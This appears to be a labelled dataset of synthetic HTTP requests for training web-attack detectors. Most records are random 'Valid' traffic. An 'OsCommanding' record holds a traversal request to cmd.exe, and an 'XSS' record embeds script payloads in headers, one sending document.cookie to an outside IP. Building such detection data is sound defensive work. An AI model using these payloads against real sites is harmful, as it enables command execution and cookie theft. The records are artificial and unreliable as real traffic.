Accept-Charset: euc-cn;q=0.7, windows-1254, iso-8859-15;q=0.6, cp-936;q=0.1
Accept-Encoding: 
Accept-Language: Oan2fina-Da, eodowdhq-howgrotr, sgiraho-KeD;q=0.2, pu-me;q=0.7
Cache-Control: max-age=90
Client-ip: 86.247.207.18
Cookie: gkubtnlRh5td88t=t_qs;aE=shneiaaeorByE;alus7biKdqeeeFi=d;sdeAS=w0sici1rsvsecsis
Cookie2: $Version="86"
Date: Sat, 29 Jan 05 14:03:12 CET
ETag: "GFsg.faK@trgN@CsoV"
Expect: 100-continue
From: cewts@1fgr.fr
If-Modified-Since: Thu, 05 Oct 06 16:33:05 GMT
If-Unmodified-Since: Mon, 28 May 07 04:30:42 GMT
If-Match: "pPmgDTJMULzDHOVZDTL"
If-None-Match: *
If-Range: "wNk.zC30bLAvh.Qwl"
Max-Forwards: 1734
MIME-Version: 0.4
Pragma: no-cache
Proxy-Authorization: NTLM YWFHbUVzVWVJY2E0dmY0bHNybWVkbnJuUmJlMHNhamlobG8zdXM=
Authorization: eIymk ItnthXy=ursdHCat
Range: 2-1818,846125-
Referer: /ao3rs/eotewnd1/fdr7m.doc
TE: deflate
Trailer: Accept-Encoding
User-Agent: Encgcv4nraNosuTerS7
UA-CPU: StrongARM
UA-Disp: 4968,8587,8
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 3216x516
Via: o3r/9.7 148.141.3.138, nee/0.6 www.eaakn.jpeg
Transfer-Encoding: identity
Upgrade: EutP9q/0.0, tvoa/2.5, adr7m/4.2, mmn/1.2, egg2x/1.5
Warning: 191 www.ts61.gif "suticae" 
X-Forwarded-For: 241.79.66.180
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 46378
Start - Id: 2897
class: Valid
GET /kanLAu0.jpeg? HTTP/1.0
Host: 242.10.53.70
Connection: close
Accept: */*;q=0.3
Accept-Charset: *;q=0.4
Accept-Encoding: identity, identity
Accept-Language: lhpuqi5-b;q=0.0, dx-7Adp;q=0.9, mo-9u, rparu-c4, s-oeESiL;q=0.9
Cache-Control: no-cache
Client-ip: 247.180.237.116
Cookie: htG3SrAadOghe=16125;eeen4=toinAoOmErdlh;2bf=9853806;wltEdcsynils=n ;aRfwqeltUer=8;eez=192538
Cookie2: $Version="18"
Date: Tue, 21 Jul 09 06:32:37 GMT
ETag: "jP0fkB-UCmaOxIL.2c"
Expect: dtsf=saae
From: oDta@uengI.biz
If-Modified-Since: Thu, 06 Nov 08 03:13:13 UTC
If-Unmodified-Since: Wed, 18 Mar 09 11:55:30 GMT
If-Match: "8kjkRESk..YvOMB"
If-None-Match: *
If-Range: "siWH7nQ_s1Ry7@XUU"
Max-Forwards: 3778
MIME-Version: 9.1
Pragma: uc=n
Proxy-Authorization: aHELco LimsO0e=ho98
Authorization: iun8 uagit=frc5he
Range: 829113-62,080943-,925416-74
Referer: /zgEwori/Etos/elet/omclsT.php3
TE: deflate,gzip;q=0.4,trailers
Trailer: If-Range
User-Agent: Mozilla/5.7 (compatible; MSIE 5.2; Unix; o7lduon)
UA-CPU: Sparc
UA-Disp: 7777,5626,16
UA-OS: Win9x
UA-Color: color32
UA-Pixels: 640x6169
Via: 3.2 232.44.150.143:1802, FTP/3.3 www.wr8o.jpeg:02
Transfer-Encoding: compress
Upgrade: 7I07i/0.7, ri7He/2.5
Warning: 969 www.nthaNniO.tiff "euint3iarnws" "Sat, 08 Aug 09 16:51:19 GMT"
X-Forwarded-For: 160.9.8.226
X-Serial-Number: 440914790634409640
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 2897
Start - Id: 31170
class: Valid
GET /a2vrUSdv@@0Vbs/digatetoytmweec/awxhwu0bssees9lc/o7EvRcsYWdU/QUraphpz3allYA8d/nZw/bblRfyiedjte/hyskYTxRwKek@4dpd8/XoO.uWhYvO4e15/rddh/6cuSdlcrxaiu/LrcpU.PzHL1IZc5.asmx?qGSIE=eXQvbmMuUS&ke4ete=t&ioel=ou%40d5&nrjoKgsvcrwncnl=eOtaoteuuTyno&RchildC@KHiYJ=95319160&ma07pdrpf=pbody&ed=ntoos9htrodo&Sprgroup byoCN=85699&edamlpIAEia=e%40&hZnph-o58BE@=73346 HTTP/1.1
Host: 159.91.116.77
Connection: close
Accept: image/gif;q=0.7
Accept-Charset: *;q=0.0
Accept-Encoding: 
Accept-Language: aminrexp-ecdeeha;q=0.3, t3eo-vanhic;q=0.9, wve-1jdf;q=0.9, NEoqhni-wtee
Cache-Control: no-cache
Client-ip: 14.186.226.223
Cookie: ehatn8ntjbntag=cGQ0-X247
Cookie2: $Version="352"
Date: Thu, 01 Jan 09 16:06:21 GMT
ETag: W/"QyxjSyvsTg4PumalC8A"
Expect: rair
From: xdis0@redoex.de
If-Modified-Since: Thu, 13 Aug 09 07:15:42 CET
If-Unmodified-Since: Mon, 29 Dec 08 03:22:53 GMT
If-Match: *
If-None-Match: *
If-Range: Thu, 14 Feb 08 11:59:30 CET
Max-Forwards: 5702
MIME-Version: 2.5
Pragma: no-cache
Proxy-Authorization: t31q4h eigtbotb=ilotn
Authorization: Basic ZWlzZXZvaTp0MnR0b2M=
Range: 41-,7530-978
Referer: http://tiniudt.it/atao.png
TE: chunked;q=0.2,trailers
Trailer: If-Modified-Since
User-Agent: ocat2ve/2.1.6.2
UA-CPU: StrongARM
UA-Disp: 2491,001,32
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 085x6333
Via: igdEo/7.3 www.eehumoLp.shtml, raoyt/8.7 88.125.247.82
Transfer-Encoding: identity
Upgrade: Lr9lei/6.9, imH4t/7.3
Warning: 047 www.AtoX9nes.js "hsmitves7S" "Sun, 30 Aug 09 10:25:13 CET"
X-Forwarded-For: 193.229.38.157
X-Serial-Number: 1704318559609
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 31170
Start - Id: 1069
class: Valid
GET /mxEh/ik0I2nLKB/u8sLERvSoUBeo/naemhfoldsisetlir/iwTsotg5n7en/hZ.8MVL4Ye-DF-aWZtY3/irdcukBsd-6HBjriu-g/t32evalQmetaw/mIFl6H/5Ndt9RnjSee/d3P95e63WuQUFb.jpg? HTTP/1.0
Host: www.pamaeoe2u.ch
Connection: close
Accept: */*;q=0.5
Accept-Charset: *;q=0.0
Accept-Encoding: *;q=0.8
Accept-Language: *;q=0.4
Cache-Control: e8IiF='Nlc4eHy'
Client-ip: 223.62.200.181
Cookie: fcn6=2;tyodt0jrt9=Res;vSuiiide75tsaa=lgCrJ0;neetrr=h;S9@ptelnet=kd6c;vneeomp=sock_streamahb7Ne1i
Cookie2: $Version="02"
Date: Fri, 20 Mar 09 13:36:24 GMT
ETag: "MBYdrLnpsGghlNJhwg"
Expect: 100-continue
From: hsrtboi@onni.cz
If-Modified-Since: Sat, 14 Jul 07 17:08:30 CET
If-Unmodified-Since: Sat, 09 Aug 08 09:21:25 GMT
If-Match: "haa3yhQYB_IFIzi"
If-None-Match: "m-67dfa.Bd.tHsg-Eyn"
If-Range: Mon, 11 Sep 06 20:50:25 CET
Max-Forwards: 924
MIME-Version: 7.0
Pragma: no-cache
Proxy-Authorization: NTLM aXRyZXNkbzRvcnhyY2VleXR0ZW1ybnNhRXplbnphaTdSNW9SYWVpYmVuNg==
Authorization: Digest response="88A4Df7d3fC120754D9Fb85f13E61bA0"
Range: 46238-
Referer: http://www.essyq.st/tNoh2.asmx
TE: trailers
Trailer: If-Modified-Since
User-Agent: i9IprV http://www.ueietk.biz
UA-CPU: MIPS
UA-Disp: 465,0552,8
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 5208x202
Via: 2lti/4.9 www.hneOnjbt.html, uqdil/0.9 www.ereuruog.shtml, FTP/4.5 234.229.58.86:5
Transfer-Encoding: identity
Upgrade: mie/3.2, kgma/1.7, oli/9.3, oyl/8.2
Warning: 193 www.rtlgaoe.html "hooiiessaotooale" "Fri, 01 Sep 06 09:10:44 CET"
X-Forwarded-For: 65.243.221.166
X-Serial-Number: 50030197738095040430
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

null

End - Id: 1069
Start - Id: 43994
class: OsCommanding
GET ..��../winnt/system32/cmd.exe?/c+dir HTTP/1.1
Host: 22.182.123.92:0536
Connection: close
Accept: */*;q=0.8
Accept-Charset: x-mac-japanese;q=0.8, windows-874;q=0.5, windows-1254, windows-1255
Accept-Encoding: deflate, gzip
Accept-Language: *
Cache-Control: min-fresh=3
Client-ip: 203.23.228.32
Cookie: lictMeO=ns 
Cookie2: $Version="691"
Date: Thu, 30 Aug 07 01:53:56 UTC
ETag: "WKKEhSDEdJpn_XZ.E"
Expect: inTns
From: 44fa@mshrPyo.gov
If-Modified-Since: Sat, 26 Aug 06 05:54:21 CET
If-Unmodified-Since: Sat, 21 Apr 07 02:06:37 UTC
If-Match: *
If-None-Match: *
If-Range: Mon, 04 Aug 08 09:11:38 CET
Max-Forwards: 9310
MIME-Version: 9.9
Pragma: remcbotW='r'
Proxy-Authorization: Qyeeu qzNllaee=zsachi
Authorization: iozfa lptaoDn=iaErbu
Range: 29-,-5
Referer: http://NAyeut.gov/6nrn/erDysep/hfm0weM/rrpao.exe
TE: trailers
Trailer: Referer
User-Agent: sqdoI0hlekaxpbrjst
UA-CPU: x86
UA-Disp: 402,257,32
UA-OS: Win98
UA-Color: color8
UA-Pixels: 5667x180
Via: FTP/9.7 www.hkmq8vs.htm
Transfer-Encoding: ikai; mnotso=9pei
Upgrade: hri4/0.3, heuue/7.3
Warning: 170 126.27.186.211 "do3kdsikezlS" "Fri, 29 May 09 15:50:00 UTC"
X-Forwarded-For: 67.28.144.149
X-Serial-Number: 8515665
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 43994
Start - Id: 48212
class: XSS
POST /-vnph-20zL73f@rbinU/m@AAbbN8/nheeo4nntSnsaEstos/ayBiY65hwy.4PirtW/kmc30stZot4ken/-oCscyWexec/eETSuNAixIbNEB4/jZaN1wXXDV.cgi? HTTP/1.0
Content-Length: 27
Content-Language: Uigsoe3,l
Content-Encoding: compress
Content-Location: http://www.2nerAnd0.be/qsaanei/slKb/gpriusA/spte8/stTeeb.bin
Content-MD5: YWV4cGFhVXNwbnJ0OWhqQQ==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 18 May 04 13:04:56 GMT
Last-Modified: Thu, 01 Nov 07 04:37:29 UTC
Host: 235.236.54.213
Connection: keep-alive
Accept: */*;q=0.2
Accept-Charset: windows-1258;q=0.3
Accept-Encoding: <div style   ="   behaviour: url([http://www.eran.com/script/nhktyu.pl]);   " >
Accept-Language: dtWosab-aiohe;q=0.3
Cache-Control: no-transform
Client-ip: 188.123.167.43
Cookie: eiWlvtC0ksap=hn9weeaoeKddawt;ynniDkndMaorncs=l6NU;sneslenEaeiiO=includeiy;eeqAewha3eE8f= b5sju9/Hors7e Ed ;raeSpeiEeea=31579785
Cookie2: $Version="5"
Date: Mon, 30 Aug 04 23:06:55 UTC
ETag: W/"JkNm7sD6l4qVMEyYQ5ri"
Expect: 100-continue
From: kTOsae7a@Lnatniube.cz
If-Modified-Since: Thu, 21 Dec 06 24:17:40 UTC
If-Unmodified-Since: Wed, 09 Jan 08 05:32:27 GMT
If-Match: "jB6oZq4koAZ1Qpm"
If-None-Match: *
If-Range: *
Max-Forwards: 944
MIME-Version: 6.3
Pragma: EtsIc=f
Proxy-Authorization: Digest cnonce="ccntio"
Authorization: Digest realm
Range: 9-78819
Referer: http://www.eiof5nkE.cz/eldr.gif
TE: deflate;q=0.0,trailers
Trailer: Accept-Encoding
User-Agent: <img     src =    "   mocha:[window.open('http://171.226.72.56/neal.asp'+document.cookie);]     "    >
UA-Disp: 5215,325,8
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 179x443
Via: HTTP/8.4 www.aedbedA.tiff, HTTP/8.2 www.toaT.css:578, 3.0 133.1.159.142:838
Transfer-Encoding: srhdm1; hyTkey=nlfer8
Warning: 878 www.r5rehang.gif "hcioniot2im682agn" "Thu, 10 Nov 05 20:56:18 CET"
X-Forwarded-For: 16.22.84.83
----: -----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

where5rwM=ihtaccese+ioeZn

End - Id: 48212
Start - Id: 33470
class: Valid
POST /st0oEssotWeh5iice/T6-8P0U941%ur33/3ANLObR/Jdim58d.mspx? HTTP/1.0
Content-Length: 86
Content-Language: 4fh9rse,it
Content-Encoding: compress
Content-Location: /eljis/oarivv/gW9idTrh/neTno.msf
Content-MD5: Y2VkbmU1SGllYXRkbGFlVA==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 30 Mar 07 08:38:10 GMT
Last-Modified: Fri, 20 Mar 09 20:07:02 UTC
Host: www.tDei.gov
Connection: HE8nm
Accept: text/*
Accept-Charset: *
Accept-Encoding: gzip;q=0.7
Accept-Language: E-arsfser;q=0.2
Cache-Control: eeg='otnlE'
Client-ip: 122.210.36.57
Cookie: a2t1=1;Jwc5WZJUGM=74364062
Cookie2: $Version="472"
Date: Tue, 16 Nov 04 24:25:21 CET
ETag: W/"zId7Lx4UCG_v_bT"
Expect: sabIt=etatnae;Aeesoun=3lr2Eo
From: arra@bopdn.biz
If-Modified-Since: Sat, 27 Sep 08 14:22:54 GMT
If-Unmodified-Since: Thu, 05 Aug 04 17:37:10 GMT
If-Match: "XMm7vF-eIFObvBWcu0ng"
If-None-Match: *
If-Range: *
Max-Forwards: 5
MIME-Version: 1.0
Pragma: no-cache
Proxy-Authorization: Digest nonce
Authorization: NTLM bGhkYWljbWlyYXB0ZWVhZW50eWVuaGxvdG50eXJoV2UxMmlldWlPczdy
Range: 408-106,8887-956063
Referer: /freviet/rsoortt/sixed/bxw9c2L/beane.pdf
TE: trailers,trailers,trailers
Trailer: Accept
User-Agent: Mozilla/0.6 (compatible; Konqueror/2.5; WinNT; miZn8h9enr; ngviammea; 4u655e)
UA-CPU: Sparc
UA-Disp: 0089,4532,8
UA-OS: Linux
UA-Color: color32
UA-Pixels: 4154x581
Via: urjha/8.6 www.9sahl.jpg
Transfer-Encoding: gzip
Upgrade: tbkjy/9.3, M3wzc8/5.0, too/6.5
Warning: 657 165.58.231.168 "oeofT8kteyMTk0" 
X-Forwarded-For: 24.33.216.151
X-Serial-Number: 944908095975390
----: -------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

1PFEA=9141&script0dLT335jwYj=nVHrl&oTNirill3loke=eEbaJnHj&entimlhhtaieh=L2lhs5denSaazx

End - Id: 33470
Start - Id: 12577
class: Valid
GET /v2onncEgmfoej0e.png?zetoleherz5ooie=t&tnm=nclOd&up5gnY=++hdelete HTTP/1.1
Host: www.l2mneTr.uk
Connection: keep-alive
Accept: */*;q=0.5
Accept-Charset: *
Accept-Encoding: identity;q=0.8, deflate, gzip
Accept-Language: *
Cache-Control: no-cache
Client-ip: 250.98.12.167
Cookie: va=eSbing;ytorteer7enalau=(po
Cookie2: $Version="90"
Date: Wed, 08 Mar 06 24:27:14 UTC
ETag: W/"yrlDJs1oar.qn35"
Expect: 100-continue
From: Anal8e@oBulagdgts.ch
If-Modified-Since: Sun, 25 Jan 04 02:46:02 GMT
If-Unmodified-Since: Thu, 01 Feb 07 05:36:47 GMT
If-Match: *
If-None-Match: "CK4.a0QP7C_L@S1Mo38"
If-Range: Sun, 20 Apr 08 17:43:54 UTC
Max-Forwards: 917
MIME-Version: 4.9
Pragma: no-cache
Proxy-Authorization: Digest cnonce="iCAy"
Authorization: lecalc 6vntsaiu=ieuec5oa
Range: 941-,7-5
Referer: http://www.cqob.fr/mxhtq.fgf
TE: trailers,chunked;q=0.5,trailers
Trailer: Via
User-Agent: tehgrt/3.4
UA-CPU: StrongARM
UA-Disp: 3658,3398,32
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 366x415
Via: 7.8 www.iscs.css
Transfer-Encoding: compress
Upgrade: elghc2/2.8, fpn/9.3, rhaxfl/6.1, etwdcy/6.3
Warning: 340 www.wbiNhe.htm "tioeoe" "Mon, 21 Nov 05 11:49:48 GMT"
X-Forwarded-For: 134.103.218.48
X-Serial-Number: 3472507595174879
----: -----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 12577
Start - Id: 20562
class: Valid
GET /thRvSuXE/asT1esTdO5/6r0noaeAttoo/Qdrcert4Ofuz6Enoenue.png?n3d1eRfiipNes6X=+t%5Dst3O&kpgoto=74poStahds&ehtnenomeuieao=lETM1KNkobdC&xNrrSdafwees=N2ThrtzbN&staTdl8=mg81dcj&7YehWvYJhE-=A&ioTbeqinyeE0=ldHL%40Az&6nlnia9enn=rAi%24p5ew&aara7aorslI=qYiSZL&scasKdheteu=80&gb=06778573 HTTP/1.0
Host: 169.84.82.39
Connection: tju7uae
Accept: application/*;q=0.4
Accept-Charset: macintosh;q=0.0, iso-8859-7;q=0.8, x-mac-cyrillic;q=0.0, x-mac-japanese;q=0.4, koi8;q=0.7
Accept-Encoding: deflate;q=0.9, identity, gzip;q=0.0, gzip
Accept-Language: *;q=0.6
Cache-Control: no-cache
Client-ip: 105.61.181.23
Cookie: f4ak=hTseceae3st6O;Otapi2et5raho=0;rmL-G=62662068
Cookie2: $Version="3"
Date: Thu, 05 Jul 07 09:38:03 UTC
ETag: W/"t8OYmDwHAj1TsRSRgKM"
Expect: mtonhes1=zfcsie;ntooaoh=yx3hhew
From: kyaidws@Mnhweb0.st
If-Modified-Since: Mon, 09 Aug 04 14:48:03 UTC
If-Unmodified-Since: Tue, 11 Apr 06 12:45:32 GMT
If-Match: "BkANx.6BEiekxHWAib5"
If-None-Match: "y9XN-SYCDDxashzs"
If-Range: "HII4uyF1HxNM.aLd"
Max-Forwards: 9
MIME-Version: 6.3
Pragma: no-cache
Proxy-Authorization: tesNe ndnlyfna=1n0eHgu
Authorization: onrpyc Jr56f=rrgneOa
Range: -0890
Referer: http://khhw.uk/wsdtrAm/eeoedern/kaogEo/njeld/1nTlm87z.dll
TE: chunked;q=0.1,gzip,trailers
Trailer: Host
User-Agent: tEIystovh/9.3.9
UA-CPU: StrongARM
UA-Disp: 9823,4223,32
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 7369x544
Via: HTTP/8.9 www.cJeaeo.js:08, oal/2.8 248.132.88.114
Transfer-Encoding: compress
Upgrade: rute/4.1, nnxcu/9.0, tateem/4.5, gelU8/2.5
Warning: 437 www.asscsur5.html "bthnowfvasnmeueoOe" 
X-Forwarded-For: 46.60.122.53
X-Serial-Number: 6248671751419598
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 20562
Start - Id: 32558
class: Valid
PUT /lkib/t0duegenaoUee/%uq0dzcmhsamkx/ZD6Vn-passthruEIixvari.shtml? HTTP/1.0
Content-Length: 70
Content-Language: r7it,aa,ibmm
Content-Encoding: deflate
Content-Location: http://idsr.uk/iAamraie/lHead.png
Content-MD5: MGhTUm5PUWVyb3hobmNpYQ==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 25 Nov 05 22:18:13 CET
Last-Modified: Fri, 01 Jul 05 16:05:25 GMT
Host: www.semmmq.gov
Connection: oeehas1
Accept: text/*
Accept-Charset: *;q=0.9
Accept-Encoding: *
Accept-Language: *;q=0.1
Cache-Control: no-transform
Cookie: ccrdsdwptqNTi= srcpscripttidoeif7sheeea\;6jodnet4F=myiHA4ieiie;derhspsLt=566090;e8tehiaf=19893025
Cookie2: $Version="4"
Date: Tue, 20 Dec 05 12:03:24 GMT
ETag: "8dpEDBaDU7yrqCDG"
Expect: 100-continue
If-Modified-Since: Fri, 08 May 09 14:56:43 GMT
If-Unmodified-Since: Tue, 07 Mar 06 23:44:32 GMT
If-Match: *
If-None-Match: "Egy.Y3WTeMRvH5@1az"
If-Range: Sun, 31 May 09 11:55:24 CET
Max-Forwards: 397
MIME-Version: 9.6
Pragma: no-cache
Authorization: emo9w taxite=eila
Referer: /fljslsh/askh.pl
User-Agent: i6ne (o8xjbV460@; g1B3Zzk@JH; fTlV2a)
Via: 3.1 13.172.37.154:615, 1.2 www.trjm.jpg
Transfer-Encoding: compress
Warning: 365 www.adrl.jpeg "nAii7axy" "Sat, 05 Apr 08 01:02:10 GMT"
X-Serial-Number: 788106300104
~~~~~: ~~~~~~~~~~~~~~~~~

gMh0Idff2=5CWia30xq3l&1qntlpte9t=nSpabiT5t7nno&63g=tTt58&Gfaizesy=0043

End - Id: 32558
Start - Id: 21759
class: Valid
GET /detiere/nauorundhgnuhxijoeay/NnaeM1uep/aA0oK@sTMt/euX@ZWxObgoQaT/knd.jpg?OMPMfpKadminstmpH=ntnandewsa&dseas=oe+n&1AiibyNhsayyee=tehsS&i9i1=eed93D8ids&select0DN-=8415&aee6l5vvpPt1bO=t&BoptuaVLbinGE=tm6eacn+hnt2S&lfftsyttlzn=eYCIapOSyg&miftqarmac=tNBXOH&cTmIvmanI6shs=mWdRZxPe2y&V_@lIhtaccesF5k_=u%286w%3E HTTP/1.0
Host: 50.135.67.203:80
Connection: iicLtxlt
Accept: image/jpeg;q=0.9
Accept-Charset: utf-8;q=0.6, shift_jis, windows-1253;q=0.4
Accept-Encoding: 
Accept-Language: *;q=0.4
Cache-Control: no-store
Client-ip: 139.3.29.237
Cookie: te=i@IXyZwBH@TV;4rwstorr=s7sfte1tgeRvep;efmd=inlpositionttahsw
Cookie2: $Version="446"
Date: Tue, 08 Jun 04 20:34:52 UTC
ETag: W/"N@CmVwCVNO8pXAras5py"
Expect: 100-continue
From: scmetNE@looeei.net
If-Modified-Since: Sun, 04 Jan 09 11:24:26 GMT
If-Unmodified-Since: Wed, 18 May 05 07:04:31 GMT
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 437
MIME-Version: 7.7
Pragma: no-cache
Proxy-Authorization: NTLM YlRhZ285aHJjc3VhbWJOdHN0b2hnaTl0MGJsY25ycHlkbmlBYnNzdA==
Authorization: Basic bnRhbnc3OmV2ZWRl
Range: 4-,-68,1577-
Referer: /tvtfe/nzsge9ni/2rvd/wqd80.conf
TE: trailers
Trailer: User-Agent
User-Agent: rAn8a (vR09502GCZ)
UA-CPU: PowerPC
UA-Disp: 6826,0757,32
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 9055x3634
Via: 8.5 www.Tndit.htm, 8.8 www.9steBh5.jpg
Transfer-Encoding: compress
Upgrade: edfift/6.6, ibz/2.1, akcT/6.9, eo45/7.3, is1/3.9
Warning: 636 0.247.245.254 "swrecumaca" "Mon, 28 Apr 08 13:52:46 UTC"
X-Forwarded-For: 98.250.132.6
X-Serial-Number: 229103908276446605
----: -----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 21759
Start - Id: 7336
class: Valid
PUT /iPWgxabmb1KQGsC7L5qJ/aeoe/exNdgGTxuovtKcCPuI/w34Iv/TcTv8echoF_4k4T/u7xaKXCIo_Sy.1J-A/Eticnoe0ynznnlefiE/bhavingqL5NYk7isbUSf/gasefiisHgoegu5/dnnido7isEhHH35Iret.tiff? HTTP/1.0
Content-Length: 195
Content-Language: 1ija
Content-Encoding: gzip
Content-Location: /Ehgn.swf
Content-MD5: YWl1YXRpZXdpaWVldGJwYw==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 19 Jun 07 02:58:23 GMT
Last-Modified: Thu, 10 Jan 08 17:31:25 CET
Host: 35.105.32.116
Connection: keep-alive
Accept: */*
Accept-Charset: *;q=0.2
Accept-Encoding: gzip;q=0.6, compress;q=0.1
Accept-Language: eos2b-waDb, v-utossrnf;q=0.3
Cache-Control: no-store
Client-ip: 18.53.58.226
Cookie: 8aairi=dbwx3w4;THS@wGRUX=13;lkmpna8la5ee9an=5048;ei3=Muon elogerm;ngqereetaoitxhs=x7sipassthruD=8m1sxterm1Usts
Cookie2: $Version="02"
Date: Sun, 29 Mar 09 01:49:04 CET
ETag: W/"x.1@yW8wIjiCNMwf"
Expect: 100-continue
From: sxtr@edeti.de
If-Modified-Since: Tue, 05 Feb 08 19:59:05 UTC
If-Unmodified-Since: Sun, 15 Feb 04 13:33:34 UTC
If-Match: *
If-None-Match: *
If-Range: Wed, 04 Jul 07 11:42:42 CET
Max-Forwards: 2
MIME-Version: 6.0
Pragma: no-cache
Proxy-Authorization: nsnL rMo0r=b6rnhLc
Authorization: hoiei aXug1re=ifch
Range: 0730-,-46
Referer: http://Ehohli.ch/iehT0v.nsf
TE: trailers,trailers,chunked
Trailer: Expect
User-Agent: 4NRKEW http://www.fLSedoo.uk
UA-CPU: 68000
UA-Disp: 068,389,8
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 1302x7380
Via: FTP/9.1 234.146.152.32, FTP/9.5 www.xtgAib.htm
Transfer-Encoding: compress
Upgrade: 5a1o/5.9, umu/3.5
Warning: 203 227.12.172.4 "glfymariontdS0eiet" "Sat, 14 May 05 05:37:02 GMT"
X-Forwarded-For: 109.33.9.119
X-Serial-Number: 0347000130099147
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

ww8u=taDntkh3ailaEsaopw&dwtoWLpocihen=pi&1s=701131&Hpaarse=eDk&eacipcm6alrMch=6&vqbs=vfrom"a[1st5T<t="? [l&stylnge0hsa=behiEoemndbodyraY&jlIii=htcioliea-&yes7h9rvmCini=\acceptxeew

End - Id: 7336
Start - Id: 29322
class: Valid
GET /c.OvYDO.NNP6ph.uN/r1o@7XucRwUQLX.exe? HTTP/1.1
Host: 67.163.23.179:80
Connection: pewr
Accept: application/*;q=0.2, application/zip, video/quicktime;q=0.6
Accept-Charset: iso-10646-ucs-2, x-mac-japanese, windows-1250, cp-932;q=0.7, utf-7;q=0.2
Accept-Encoding: compress, deflate;q=0.7, gzip;q=0.8, deflate;q=0.2
Accept-Language: *
Cache-Control: no-transform
Client-ip: 40.215.82.233
Cookie: 9tsotsrdpdcej=nSU9;aoaramNus5ehi=yaboot.inii(;teSgosite1qsm=6007187575;3hielpsErO3=||
Cookie2: $Version="68"
Date: Sat, 04 Mar 06 06:53:47 CET
ETag: "RIxUrX9KiKQwwV2ONBI"
Expect: 100-continue
From: yttt5iy@rcto.com
If-Modified-Since: Wed, 17 Mar 04 02:50:16 GMT
If-Unmodified-Since: Fri, 20 Aug 04 22:32:56 UTC
If-Match: "fHe3tVlLRuOBE4y@uE@x"
If-None-Match: *
If-Range: "G5ePmjC3lCt7sTr84"
Max-Forwards: 5746
MIME-Version: 0.7
Pragma: THA3slL8='ktp'
Proxy-Authorization: NTLM aGdmeUVjdG1SZHRpNXRldWVhbm11b2NoN3JuaXRjdXVyZW9l
Authorization: nsfit shjalotr=rhm8dbe7
Range: 549983-,-11
Referer: /hsvn/8e1siE/tb76ema/ugi9aHe.png
TE: gzip
Trailer: Transfer-Encoding
User-Agent: Mozilla/3.4 (X11; U; Linux i586 5.1; er-Aa; rv:9.9.7) Gecko/02110216
UA-CPU: MIPS
UA-Disp: 575,351,16
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 553x667
Via: 3.1 137.133.136.171, HTTP/1.8 www.nnhezaa.css
Transfer-Encoding: deflate
Upgrade: n1tlH/0.1, Iwotm/0.8, 4mr/3.8, entnl/4.8
Warning: 707 229.233.88.113 "toegchfersr2gftmiE" "Sat, 27 Jan 07 13:21:51 CET"
X-Forwarded-For: 63.57.100.153
X-Serial-Number: 892680378227754
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 29322
Start - Id: 32330
class: Valid
GET /oaaoceemesaa6f/wa2.jpg?eRnnxikiyei=n%7C HTTP/1.0
Host: 149.143.69.202
Connection: 4raaohul
Accept: video/*, audio/x-wav;q=0.1, video/mpeg;q=0.4
Accept-Charset: x-mac-ce, x-mac-korean;q=0.8, windows-1250, x-mac-roman
Accept-Encoding: 
Accept-Language: 0AIte-5cet;q=0.2, d-46, nvn5rrO-AtamssSo, simc-todrs
Cache-Control: no-cache
Client-ip: 155.74.53.10
Cookie: kEDtitOaRe=478
Cookie2: $Version="3"
Date: Sun, 30 Nov 08 19:23:38 UTC
ETag: "Kao7k1nsmjJ0uba"
Expect: 100-continue
From: uoia@eenManS.fr
If-Modified-Since: Sun, 30 Apr 06 13:55:33 GMT
If-Unmodified-Since: Tue, 15 Dec 09 07:50:27 CET
If-Match: "FtH8lq8EXd43UOgwEWh"
If-None-Match: "mMitNRp3Pz237K5"
If-Range: Tue, 01 Jan 08 16:32:54 GMT
Max-Forwards: 5
MIME-Version: 1.0
Pragma: no-cache
Proxy-Authorization: Basic TjBsMjJlOklhc21oc3V3
Authorization: Basic b2FzdGo6aGV0bHhka1M=
Range: 591942-158
Referer: http://www.lhSA.ch/se0aelb/oanha/Ldh0tg/we6hte/ihntt.tiff
TE: gzip;q=0.0
Trailer: Date
User-Agent: 1dnnnd (cWjzcNPkf; srYIPYPF3U; dSyS-nD; oC-i_rxN; 45U5LJB)
UA-CPU: StrongARM
UA-Disp: 5576,9149,8
UA-OS: Linux
UA-Color: color16
UA-Pixels: 831x847
Via: 3.7 155.229.152.152, FTP/0.7 www.noGTRn.html
Transfer-Encoding: gzip
Upgrade: e4m/1.1, eIg/2.0, miggf/2.6, duxk/4.7
Warning: 297 www.heuiteE.htm:96 "afr3tepTtiirwedmhdy" 
X-Forwarded-For: 132.144.23.218
X-Serial-Number: 13915181953096
----: ----------------------
